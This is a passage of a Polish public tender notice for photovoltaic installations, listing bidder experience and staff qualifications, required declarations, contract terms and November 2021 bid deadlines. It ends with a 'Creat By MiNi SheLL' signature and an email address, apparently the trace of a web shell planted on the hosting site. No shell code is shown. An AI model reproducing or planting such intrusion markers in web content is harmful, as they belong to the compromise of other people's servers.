zamówienia, tzn. że w okresie ostatnich 3 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wykonał:<br/>a) co najmniej trzy mikroinstalacje o mocy powyżej &gt;10 kW, montowane na konstrukcjach<br/>gruntowych;<br/>b) co najmniej jedną instalacja o mocy &gt;10 kW, z wykorzystaniem optymalizacji mocy na<br/>każdym module;<br/>c) co najmniej jedną instalację montowana na dachu obiektu o kubaturze powyżej 1000 m3,<br/>wykonana zgodnie z wytycznymi p. poż, dla instalacji fotowoltaicznych powyżej 6,5 kW,<br/>obowiązującymi od dnia 19.09.2020 roku.<br/>UWAGA:<br/>Zamawiający nie dopuszcza łączenia powyższej zdolności technicznej w ramach wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia<br/>(np. konsorcjum, spółka cywilna), w celu spełnienia warunku udziału<br/>w postępowaniu, tzn. w przypadku składania oferty przez wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia, przynajmniej jeden z członków musi spełniać warunek zdolności<br/>technicznej w całości. W przypadku korzystania<br/>z potencjału podmiotu trzeciego w zakresie spełnienia tego warunku, podmiot ten także musi<br/>samodzielnie spełniać warunek udziału w postępowaniu.<br/>W przypadku wykazywania się przez wykonawcę usługami/dostawami nadal wykonywanymi<br/>wówczas zobowiązany jest wykazywać się usługami/dostawami już zrealizowanymi (w<br/>szczególności w zakresie wartości i potwierdzenia ich należytego wykonania).<br/>dysponowania osobami zdolnymi do wykonania zamówienia<br/>Wykonawca zobowiązany jest wykazać, że osoba/osoby, która/które będą uczestniczyć w<br/>realizacji zamówienia będą posiadały co najmniej jednego instalatora zatrudnionego na umowę o<br/>pracę, z uprawnieniami do wykonywania zawodu elektryka typu „E” oraz certyfikatami instalatora<br/>OZE – fotowoltaika, wydanym przez Prezesa Urzędu Dozoru Technicznego. Zamawiający<br/>dopuszcza aby osoba wskazana przez Wykonawcę, posiadała dwa rodzaje wymaganych<br/>uprawnień określonych powyżej. Zamawiający dopuszcza także odpowiadające im uprawnienia<br/>wydane obywatelom państw członkowskich Unii Europejskiej, w zakresie którego właściwy<br/>organ wydaje decyzję w sprawie uznania kwalifikacji zawodowych na zasadach określonych w<br/>ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r., poz. 220).2. Wykonawca może, w celu potwierdzenia spełniania warunków udziału w postępowaniu,<br/>polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia<br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym<br/>wykonawcą, który złożył ofertę częściową, albo oświadczenia<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty częściowej, w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3) wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających<br/>się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz<br/>załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń<br/>powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego<br/>nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające<br/>ich należyte wykonywanie powinny być wystawione<br/>w okresie ostatnich 3 miesięcy - załącznik nr 8 do SWZ;<br/>4) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia<br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 9 do<br/>SWZ ;<br/>5) Polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia<br/>na kwotę 500 000,00 złotych.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów:<br/>• Pełnomocnictwo upoważniające do podpisania oferty, o ile ofertę podpisuje pełnomocnik;<br/>• Pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia – jeżeli dotyczy;<br/>• Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz o braku<br/>podstaw do wykluczenia z postępowania - wzór oświadczenia stanowi Załącznik nr 3 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie to<br/>składa każdy z Wykonawców.<br/>• W przypadku wykonawców wspólnie ubiegających się o udzielnie zamówienia, podpisane<br/>(jednym z podpisów, o których mowa w ust. 3 niniejszego rozdziału) oświadczenie, o którym<br/>mowa w art. 117 ust. 4 ustawy, z którego wynika, które usługi wykonają poszczególni<br/>wykonawcy.<br/>• Inne<br/>• Oświadczenie podmiotu udostępniającego zasoby na podstawie art. 118 ustawy<br/>potwierdzające brak podstaw wykluczenia (w związku z art. 119 ustawy) wraz ze<br/>zobowiązaniem tego podmiotu do oddania do dyspozycji wykonawcy niezbędnych zasobów na<br/>potrzeby realizacji zamówienia – zgodnie z załącznikiem nr 7 do SWZ.<br/>• Uzasadnienie dotyczące tajemnicy przedsiębiorstwa – jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenia i dokumenty wymienione w ust. 3 pkt 1) i 2) niniejszego rozdziału SWZ dotyczą w<br/>przypadku wspólnego ubiegania się o zamówienie, przez każdego z tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający na podstawie art. 455 ustawy przewiduje możliwość dokonania zmiany zawartej<br/>umowy, wyłącznie w zakresie dopuszczalnym przepisami Ustawy, za zgodą obu Stron, w<br/>okolicznościach wskazanych w projektowanych postanowieniach umowy stanowiących<br/>załącznik nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-03 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">oferty należy składać, za pośrednictwem miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-03 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com